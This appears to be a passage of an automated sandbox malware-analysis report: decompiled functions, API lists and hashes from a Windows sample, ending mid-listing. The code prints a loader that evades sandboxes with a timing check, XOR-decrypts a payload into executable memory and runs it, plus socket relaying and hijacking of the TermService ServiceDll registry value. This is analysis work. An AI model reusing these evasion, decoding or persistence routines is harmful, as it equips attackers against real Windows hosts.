Opcode Fuzzy Hash: 64967091012ca3be463ff2ce303d0a86b5d73f2fd2893906bdc5862f7497788f
Instruction Fuzzy Hash: EEE0D870A8020C15CF356BF5AC0BBE73BA81F42744F0401F9A152F11C0DA7CC98ACAE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D279 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040D279() {
				intOrPtr _v272;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t8;

				_v288 = 0x11c;
				_t5 = LoadLibraryA("ntdll.dll");
				if(_t5 == 0) {
					L3:
					if(_v272 != 2) {
						goto L5;
					} else {
						return _v284;
					}
				} else {
					_t8 = GetProcAddress(_t5, "RtlGetVersion");
					if(_t8 == 0) {
						L5:
						return 0;
					} else {
						 *_t8( &_v288);
						goto L3;
					}
				}
			}

0x0040d287
0x0040d291
0x0040d299
0x0040d2b4
0x0040d2bb
0x00000000
0x0040d2bd
0x0040d2c4
0x0040d2c4
0x0040d29b
0x0040d2a1
0x0040d2a9
0x0040d2c5
0x0040d2c8
0x0040d2ab
0x0040d2b2
0x00000000
0x0040d2b2
0x0040d2a9

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040D291
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040D2A1

Strings

ntdll.dll, xrefs: 0040D282
RtlGetVersion, xrefs: 0040D29B

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 2574300362-1489217083
Opcode ID: d7824df8614f9b0efb3c46f3d5247e345fb4ffd86b33bc06f85d5c1a7d7fc120
Instruction ID: c27852d06fb29ab0cd027fb9d2e63a841b101ce654ee04220e336b10604338cb
Opcode Fuzzy Hash: d7824df8614f9b0efb3c46f3d5247e345fb4ffd86b33bc06f85d5c1a7d7fc120
Instruction Fuzzy Hash: 24E01230A4021C56DB24ABF1AC0ABD777A46B45748F0045E9A605E11C1DAB8D989CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 0040E721 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0040E721(intOrPtr* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t6;
				intOrPtr* _t12;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t12 = __ecx;
				_t6 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t6 != 0) {
					 *_t6( *_t12,  &_v8);
				}
				return _v8;
			}

0x0040e724
0x0040e725
0x0040e734
0x0040e73d
0x0040e745
0x0040e74d
0x0040e74d
0x0040e754

APIs

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0040D795,?,?,00402B66,?,00412428,?,?), ref: 0040E736
GetProcAddress.KERNEL32(00000000,?,?,?,0040D795,?,?,00402B66,?,00412428,?,?), ref: 0040E73D

Strings

IsWow64Process, xrefs: 0040E72A
kernel32, xrefs: 0040E72F

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32
API String ID: 1646373207-3789238822
Opcode ID: daa59590f0409d85a6d0c8b829a52e8d91f30d11b18e7659024770b728c280be
Instruction ID: ebc29d562f1187ef1a98fba33f7c5dc42ac0c4bc1182f8b569bc78a6ab039afe
Opcode Fuzzy Hash: daa59590f0409d85a6d0c8b829a52e8d91f30d11b18e7659024770b728c280be
Instruction Fuzzy Hash: 45E08671600204FBDB14DBA1DD09FDE777CEB44355B100059A511E2140D7B89A00D758

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2C2 Relevance: 6.3, APIs: 5, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040B2C2(signed int* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t23;
				void* _t33;
				struct _CRITICAL_SECTION* _t43;
				signed int* _t59;
				intOrPtr _t62;
				void* _t66;

				_t45 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				_t43 = __ecx + 0x3d8;
				EnterCriticalSection(_t43);
				_t67 = _t59[0x7b];
				_t62 = _a4;
				if(_t59[0x7b] != 0) {
					L2:
					_t69 = _t59[3];
					if(_t59[3] != 0) {
						L5:
						_t63 =  &(_t59[0xf1]);
						_t22 = E004020D3( &(_t59[0xf1]), 0);
						__eflags = _t22;
						if(_t22 == 0) {
							E00401EB9(_t63);
						}
						_t23 = E004020D3( &(_t59[0xf3]), 0);
						__eflags = _t23;
						if(_t23 == 0) {
							E00401EB9( &(_t59[0xf3]));
						}
						_v12 = _t59[4];
						_v8 = _t59[0x7c];
						E00401E8E(_t63, E0040B1E8,  &_v12);
						E00401E8E( &(_t59[0xf3]), E0040B255,  &_v12);
						 *_t59 = 1;
						LeaveCriticalSection(_t43);
						E004020D3( &(_t59[0xf1]), 0xffffffff);
						E004020D3( &(_t59[0xf3]), 0xffffffff);
						EnterCriticalSection(_t43);
						 *_t59 =  *_t59 & 0x00000000;
						LeaveCriticalSection(_t43);
						E0040B46D(_t59);
						_t33 = 0;
						__eflags = 0;
					} else {
						E004031BB(_t66, _t62);
						if(E00405294( &(_t59[1]), _t69, _t45,  *((intOrPtr*)(_t62 + 4))) != 0) {
							goto L5;
						} else {
							goto L4;
						}
					}
				} else {
					E004031BB(_t66, _t62 + 8);
					if(E00405294( &(_t59[0x79]), _t67,  &(_t59[0x79]),  *((intOrPtr*)(_t62 + 0xc))) == 0) {
						L4:
						LeaveCriticalSection(_t43);
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

0x0040b2c2
0x0040b2c5
0x0040b2c6
0x0040b2ca
0x0040b2cc
0x0040b2d3
0x0040b2d9
0x0040b2e0
0x0040b2e3
0x0040b303
0x0040b303
0x0040b307
0x0040b330
0x0040b330
0x0040b33a
0x0040b33f
0x0040b341
0x0040b345
0x0040b345
0x0040b352
0x0040b357
0x0040b359
0x0040b361
0x0040b361
0x0040b36b
0x0040b374
0x0040b380
0x0040b394
0x0040b3a0
0x0040b3a6
0x0040b3b0
0x0040b3bd
0x0040b3c3
0x0040b3c9
0x0040b3cd
0x0040b3d1
0x0040b3d6
0x0040b3d6
0x0040b309
0x0040b310
0x0040b31f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b31f
0x0040b2e5
0x0040b2ef
0x0040b301
0x0040b321
0x0040b322
0x0040b32a
0x00000000
0x00000000
0x00000000
0x0040b301
0x0040b3dc

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040B2D3
LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0040B322

Part of subcall function 004031BB: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,0040290F,?,?,00000000,exit,00000000,start), ref: 004031E0

Part of subcall function 00405294: getaddrinfo.WS2_32(?,00000000,004049B2,00000000), ref: 004052E1
Part of subcall function 00405294: socket.WS2_32(00000002,00000001,00000000), ref: 004052F8
Part of subcall function 00405294: htons.WS2_32(?), ref: 0040531E
Part of subcall function 00405294: freeaddrinfo.WS2_32(00000000), ref: 0040532E
Part of subcall function 00405294: connect.WS2_32(?,?,00000010), ref: 0040533A

LeaveCriticalSection.KERNEL32(?), ref: 0040B3A6
EnterCriticalSection.KERNEL32(?), ref: 0040B3C3
LeaveCriticalSection.KERNEL32(?), ref: 0040B3CD

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
String ID:
API String ID: 4195813003-0
Opcode ID: d2186f9b9d468435da629a9d53f3a80bb8ac4522cff6a878c83fd27f552db59a
Instruction ID: c014d6a5cbc9cc62c5e1f3a19af2f51ba3110d45d10fa0418e49f0bc623e5669
Opcode Fuzzy Hash: d2186f9b9d468435da629a9d53f3a80bb8ac4522cff6a878c83fd27f552db59a
Instruction Fuzzy Hash: A4316171200606BBD704EBA2DD55BAAB7ACEF04354F10413AE919A21D1DB78AA14CBDC

Uniqueness

Uniqueness Score: -1.00%

Function 0040D07E Relevance: 6.1, APIs: 4, Instructions: 53
networksleepCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040D07E(void* __ecx, void* __edx) {
				signed int _v8;
				char _v2056;
				signed int* _t9;
				signed int _t15;
				char* _t16;
				void* _t17;
				void* _t22;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t9 =  &_v8;
				_t23 = __ecx;
				_t22 = __edx;
				__imp__#10(__ecx, 0x4004667f, _t9);
				if(_t9 == 0xffffffff) {
					L4:
					return 0;
				}
				if(_v8 == 0) {
					Sleep(1);
					L7:
					return 1;
				}
				E00401052( &_v2056, 0, 0x800);
				_t15 =  &_v2056;
				__imp__#16(_t23, _t15, 0x800, 0, _t17);
				_v8 = _t15;
				if(_t15 == 0) {
					goto L4;
				}
				_t16 =  &_v2056;
				__imp__#19(_t22, _t16, _t15, 0);
				if(_t16 > 0) {
					goto L7;
				}
				goto L4;
			}

0x0040d087
0x0040d08b
0x0040d091
0x0040d093
0x0040d09b
0x0040d0a4
0x0040d0f2
0x00000000
0x0040d0f2
0x0040d0aa
0x0040d0fa
0x0040d100
0x00000000
0x0040d102
0x0040d0bc
0x0040d0c4
0x0040d0cf
0x0040d0d5
0x0040d0db
0x00000000
0x00000000
0x0040d0e0
0x0040d0e8
0x0040d0f0
0x00000000
0x00000000
0x00000000

APIs

ioctlsocket.WS2_32(00000000,4004667F,00000000), ref: 0040D09B
recv.WS2_32(00000000,?,00000800,00000000), ref: 0040D0CF
send.WS2_32(00000000,?,00000000,00000000), ref: 0040D0E8
Sleep.KERNEL32(00000001), ref: 0040D0FA

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Sleepioctlsocketrecvsend
String ID:
API String ID: 1168213214-0
Opcode ID: 6210963b8d8057c04443d269ffda838e3d902a4b0fba95c3aac5bbc1c3d01664
Instruction ID: 701ac5b725064c4b0a4fbc5e1cd44647a3ae98db76a5d922a0a67313ee472f7f
Opcode Fuzzy Hash: 6210963b8d8057c04443d269ffda838e3d902a4b0fba95c3aac5bbc1c3d01664
Instruction Fuzzy Hash: 270188B1940114BBE72097B49D49FEF36ACEB44315F148072B615E11C0EBB88E0997AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA7E Relevance: 6.0, APIs: 4, Instructions: 35
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CA7E(void* __ecx) {
				void* _t14;
				long _t15;
				void** _t26;
				void* _t27;

				_t27 = __ecx;
				_t1 = _t27 + 0x14; // 0x41658c
				_t26 = _t1;
				if( *_t26 == 0) {
					L6:
					_t5 = _t27 + 0x10; // 0x416588
					E0040CC81(_t5);
					_t6 = _t27 + 4; // 0x41657c
					E0040CC81(_t6);
					_t7 = _t27 + 0xc; // 0x416584
					E0040CC81(_t7);
					_t8 = _t27 + 8; // 0x416580
					_t14 = E0040CC81(_t8);
					 *(_t27 + 0x18) =  *(_t27 + 0x18) & 0x00000000;
					return _t14;
				}
				_t15 = GetCurrentThreadId();
				_t2 = _t27 + 0x18; // 0x0
				if(_t15 ==  *_t2) {
					L5:
					E0040CC81(_t26);
					goto L6;
				}
				if( *(_t27 + 0x10) == 0) {
					return _t15;
				}
				_t4 = _t27 + 0x10; // 0x0
				SetEvent( *_t4);
				if(WaitForSingleObject( *_t26, 0x1388) == 0x102) {
					TerminateThread( *_t26, 0xfffffffe);
				}
				goto L5;
			}

0x0040ca7f
0x0040ca82
0x0040ca82
0x0040ca88
0x0040cac9
0x0040cac9
0x0040cacc
0x0040cad1
0x0040cad4
0x0040cad9
0x0040cadc
0x0040cae1
0x0040cae4
0x0040cae9
0x00000000
0x0040cae9
0x0040ca8a
0x0040ca90
0x0040ca93
0x0040cac2
0x0040cac4
0x00000000
0x0040cac4
0x0040ca99
0x0040caef
0x0040caef
0x0040ca9b
0x0040ca9e
0x0040cab6
0x0040cabc
0x0040cabc
0x00000000

APIs

GetCurrentThreadId.KERNEL32(?,00000000,00402904,00000000,exit,00000000,start), ref: 0040CA8A
SetEvent.KERNEL32(00000000), ref: 0040CA9E
WaitForSingleObject.KERNEL32(0041658C,00001388), ref: 0040CAAB
TerminateThread.KERNEL32(0041658C,000000FE), ref: 0040CABC

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Thread$CurrentEventObjectSingleTerminateWait
String ID:
API String ID: 2174867186-0
Opcode ID: 7b442c0c348a819acb6947a42034595b9fbd188a55982e7555e59c211741bb57
Instruction ID: ac5dfd55fb854e65227195a4494322577c45a772729071e2d18f3cd1317e2fa1
Opcode Fuzzy Hash: 7b442c0c348a819acb6947a42034595b9fbd188a55982e7555e59c211741bb57
Instruction Fuzzy Hash: 79016931500600DFE730EF21D899BAB77B2FF54311F584B3EE456A18E0DBB86999DA48

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF64 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BF64(void* __edx) {
				void* _v8;
				void* _v12;
				short* _v16;
				int _v20;
				char _v24;
				void* _t28;
				void* _t46;
				int _t48;

				_t46 = __edx;
				_v8 = 0;
				E004033AB( &_v16, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v24 = 0;
				_v20 = 0;
				if(RegOpenKeyExW(0x80000002, _v16, 0, 0x20119,  &_v8) != 0) {
					L3:
					_t48 = 0;
				} else {
					_t28 = E0040EAAE( &_v8, _t46, E004033AB( &_v12, L"ServiceDll"),  &_v24);
					E004058FB(_v12);
					if(_t28 != 0) {
						_t48 = E0040300E(E00402CA1( &_v24, __eflags,  &_v12), 0x417cfc);
						E004058FB(_v12);
						_v12 = 0;
					} else {
						E0040EA99( &_v8);
						goto L3;
					}
				}
				E00402DFF( &_v24);
				E004058FB(_v16);
				E0040EA99( &_v8);
				return _t48;
			}

0x0040bf64
0x0040bf76
0x0040bf79
0x0040bf81
0x0040bf8e
0x0040bf9e
0x0040bfd0
0x0040bfd0
0x0040bfa0
0x0040bfb5
0x0040bfbf
0x0040bfc6
0x0040c00b
0x0040c00d
0x0040c012
0x0040bfc8
0x0040bfcb
0x00000000
0x0040bfcb
0x0040bfc6
0x0040bfd5
0x0040bfdd
0x0040bfe5
0x0040bfef

APIs

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

RegOpenKeyExW.ADVAPI32 ref: 0040BF96

Part of subcall function 0040EAAE: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAD1
Part of subcall function 0040EAAE: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAF4

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Part of subcall function 0040EA99: RegCloseKey.KERNEL32(?), ref: 0040EAA3

Strings

ServiceDll, xrefs: 0040BFA4
SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040BF71

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
API String ID: 1903904756-387424650
Opcode ID: 77223e9beb28355393e47e515ecd4fd42c2d64bfc197a7d1dfd1193c3d2e0f9c
Instruction ID: 9765c8c69e09662c28479e68e5e47569de507f49e674c72ea32b24ba61643531
Opcode Fuzzy Hash: 77223e9beb28355393e47e515ecd4fd42c2d64bfc197a7d1dfd1193c3d2e0f9c
Instruction Fuzzy Hash: 03115171E00209BACB14EBA2DD568EEBB78EF84305F10007EA801B32C1DB785F05DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAFB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BAFB(void* __ecx, void* __edx) {
				void* _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char _v28;
				char _v36;
				void* _t26;
				void* _t28;
				void* _t43;
				int _t44;
				void* _t45;

				_t43 = __edx;
				_t45 = __ecx;
				_t44 = 0;
				_v12 = 0;
				E004033AB( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v28 = 0;
				_v24 = 0;
				if(RegOpenKeyExW(0x80000002, _v20, 0, 0x102,  &_v12) == 0) {
					_t26 = E00402FE7(_t45 + 0x34, _t43,  &_v36);
					_t28 = E0040EB18( &_v12, E004033AB( &_v16, L"ServiceDll"), _t26, 2);
					E004058FB(_v16);
					_v16 = 0;
					E00402DFF( &_v36);
					E0040EA99( &_v12);
					if(_t28 != 0) {
						_t44 = 1;
					}
				}
				E00402DFF( &_v28);
				E004058FB(_v20);
				E0040EA99( &_v12);
				return _t44;
			}

0x0040bafb
0x0040bb03
0x0040bb05
0x0040bb0f
0x0040bb12
0x0040bb1a
0x0040bb27
0x0040bb37
0x0040bb42
0x0040bb59
0x0040bb63
0x0040bb6b
0x0040bb6e
0x0040bb76
0x0040bb7d
0x0040bb7f
0x0040bb7f
0x0040bb7d
0x0040bb83
0x0040bb8b
0x0040bb93
0x0040bb9d

APIs

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

RegOpenKeyExW.ADVAPI32 ref: 0040BB2F

Part of subcall function 0040EB18: RegSetValueExW.ADVAPI32 ref: 0040EB37

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Part of subcall function 0040EA99: RegCloseKey.KERNEL32(?), ref: 0040EAA3

Strings

ServiceDll, xrefs: 0040BB48
SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040BB07

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: lstrlen$CloseFreeOpenValueVirtuallstrcpy
String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
API String ID: 2854241163-387424650
Opcode ID: 0418c3ef56162aff305e291369424664bf30e5ff3999472e6f600fbeff4a7626
Instruction ID: c990f0b02173a94c8d8364d914472c003d83b5c301375739e1ad41474b62aec1
Opcode Fuzzy Hash: 0418c3ef56162aff305e291369424664bf30e5ff3999472e6f600fbeff4a7626
Instruction Fuzzy Hash: 081142719002196BCB14FB92CC56DFFBB78EF94304F40447EE902721C1DB785A45CA58

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wwpicppqkrphnp.exePID: 1580, Parent PID: 1860COMMON

Executed Functions

Function 00401000 Relevance: 43.9, APIs: 21, Strings: 4, Instructions: 177
sleepprocessmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E00401000(struct HWND__* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t39;
				long _t40;
				void* _t42;
				short* _t45;
				void* _t48;
				long _t53;
				int _t54;
				void* _t60;
				long _t62;
				void* _t64;
				signed int _t74;
				signed char* _t75;
				signed int _t81;
				void* _t82;
				int _t88;
				WCHAR* _t89;
				char* _t91;
				void* _t93;
				WCHAR* _t94;
				long _t96;
				void* _t97;
				void** _t98;
				void** _t99;
				WCHAR** _t100;
				void** _t104;

				_t97 = _t98[0xa1];
				 *_t98 = 0; // executed
				__imp__GetConsoleWindow(); // executed
				ShowWindow(__eax, 0); // executed
				_t39 = GetTickCount();
				_t92 = _t39;
				Sleep(0x2be); // executed
				_t40 = GetTickCount();
				_t105 = _t40 - _t39 - 0x2bc;
				if(_t40 - _t39 < 0x2bc) {
					_t42 = GetCurrentProcess();
					__imp__IsWow64Process(_t42,  &(_t98[2]));
					if(_t42 == 0 || _t98[2] == 0) {
						_t93 = _t98[0xa0];
						if(_t93 < 2) {
							L17:
							return 1;
						}
						_t74 = 1;
						_t88 = 0;
						do {
							_t45 =  *((intOrPtr*)(_t97 + _t74 * 4));
							if( *_t45 != 0x2f) {
								__eflags = _t88;
								_t88 =  ==  ? _t45 : _t88;
							} else {
								_t48 = E00404211(_t45, L"/norestart");
								_t98 =  &(_t98[2]);
								if(_t48 != 0) {
									E00404211( *((intOrPtr*)(_t97 + _t74 * 4)), L"/quiet");
									_t98 =  &(_t98[2]);
								}
							}
							_t74 = 1 + _t74;
						} while (_t93 != _t74);
						if(_t88 != 0) {
							__imp__CoInitialize(0);
							GetTempPathW(0xff,  &(_t98[0x19]));
						}
						goto L17;
					} else {
						_t98[1] = 1;
						asm("xorps xmm0, xmm0");
						_t94 =  &(_t98[8]);
						asm("movups [esi+0x4], xmm0");
						asm("movups [esi+0x14], xmm0");
						asm("movups [esi+0x24], xmm0");
						asm("movups [esi+0x34], xmm0");
						 *_t94 = 0x44;
						_t89 =  &(_t98[0x19]);
						GetSystemDirectoryW(_t89, 0x104);
						E004041E0(_t89, L"\\wusa.exe");
						_t99 =  &(_t98[2]);
						__imp__Wow64DisableWow64FsRedirection();
						_t53 = GetCommandLineW();
						_t100 = _t99 - 0x28;
						_t100[9] =  &(_t100[0xe]);
						_t100[8] = _t94;
						_t100[7] = 0;
						_t100[6] = 0;
						asm("xorps xmm0, xmm0");
						asm("movups [esp+0x8], xmm0");
						_t100[1] = _t53;
						 *_t100 = _t89;
						_t54 = CreateProcessW( &(_t99[3]), ??, ??, ??, ??, ??, ??, ??, ??, ??);
						__eflags = _t54;
						if(_t54 != 0) {
							WaitForSingleObject(_t100[5], 0xffffffff);
							GetExitCodeProcess(_t100[5],  &(_t100[1]));
							CloseHandle(_t100[4]);
							CloseHandle(_t100[5]);
						}
						__imp__Wow64RevertWow64FsRedirection(_t100[3]);
						ExitProcess(_t100[1]);
					}
				}
				_t60 = E004034D3( *((intOrPtr*)(_t97 + 4)), L"rb"); // executed
				_t90 = _t60;
				E004038C1(_t82, _t60, 0, 2); // executed
				_t62 = E00403B98(0, _t82, _t60, _t92, _t105, _t60); // executed
				_t96 = _t62;
				E004038C1(_t82, _t60, 0, 0); // executed
				_t104 =  &(_t98[9]);
				_t64 = VirtualAlloc(0, _t96, 0x3000, 0x40); // executed
				_t75 = _t64;
				 *_t104 = _t64;
				E004036BE(_t64, _t96, 1, _t90); // executed
				_t98 =  &(_t104[4]);
				if(_t96 == 0) {
					L5:
					goto __eax;
				}
				 *_t75 =  *_t75 ^ 0x00000032;
				if(_t96 != 1) {
					_t81 = 1;
					_t91 = "48058040134";
					do {
						 *( *_t98 + _t81) =  *( *_t98 + _t81) ^ _t91[ ~((_t81 * 0xaaaaaaab >> 0x00000020 >> 0x00000001 & 0xfffffffc) + (_t81 * 0xaaaaaaab >> 0x00000020 >> 0x00000001 & 0xfffffffc) * 2)];
						_t81 = 1 + _t81;
						_t91 =  &(_t91[1]);
					} while (_t96 != _t81);
				}
			}

APIs

GetConsoleWindow.KERNEL32 ref: 00401016
ShowWindow.USER32(00000000,00000000), ref: 0040101E
GetTickCount.KERNEL32 ref: 0040102A
Sleep.KERNELBASE(000002BE), ref: 00401033
GetTickCount.KERNEL32 ref: 00401039
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00401085
__fread_nolock.LIBCMT ref: 00401095
GetCurrentProcess.KERNEL32 ref: 004010D8
IsWow64Process.KERNEL32(00000000,?), ref: 004010E4
CoInitialize.OLE32(00000000), ref: 00401145
GetTempPathW.KERNEL32(000000FF,?), ref: 00401155
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00401198
Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 004011B1
GetCommandLineW.KERNEL32 ref: 004011B7
CreateProcessW.KERNEL32 ref: 004011E5
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004011F5
GetExitCodeProcess.KERNEL32(?,?), ref: 00401204
CloseHandle.KERNEL32(?), ref: 00401214
CloseHandle.KERNEL32(?), ref: 0040121A
Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 00401220
ExitProcess.KERNEL32 ref: 0040122A

Strings

/quiet, xrefs: 00401122
\wusa.exe, xrefs: 0040119E
/norestart, xrefs: 00401110
48058040134, xrefs: 004010AC

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: ProcessWow64$CloseCountExitHandleRedirectionTickWindow$AllocCodeCommandConsoleCreateCurrentDirectoryDisableInitializeLineObjectPathRevertShowSingleSleepSystemTempVirtualWait__fread_nolock
String ID: /norestart$/quiet$48058040134$\wusa.exe
API String ID: 3408057934-2213496630
Opcode ID: fe8768648f22f0692b8560295a669788271fdd24f63a1e0b440b0572beaa4f62
Instruction ID: cf8ef039ba5b91c9880f0a559042327410600f933109a145d64942cbda34b5a7
Opcode Fuzzy Hash: fe8768648f22f0692b8560295a669788271fdd24f63a1e0b440b0572beaa4f62
Instruction Fuzzy Hash: 21513B71904341ABC710AF21ED49A6BBBE8FFD4705F00853EF999A72A1E7349884C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0040183A Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040183A() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401961); // executed
				return _t1;
			}

0x0040183f
0x00401845

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040183F

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a9086a5e2b8492a59f9121e7be8c4b619666b8eb926bdb56d80bd50e92d5f58b
Instruction ID: 7824cb74a6a676970f91987c5f8456e4ba82a1ba175575055a5e16b8f8eb3917
Opcode Fuzzy Hash: a9086a5e2b8492a59f9121e7be8c4b619666b8eb926bdb56d80bd50e92d5f58b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00408C23 Relevance: 13.8, APIs: 9, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00408C23(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
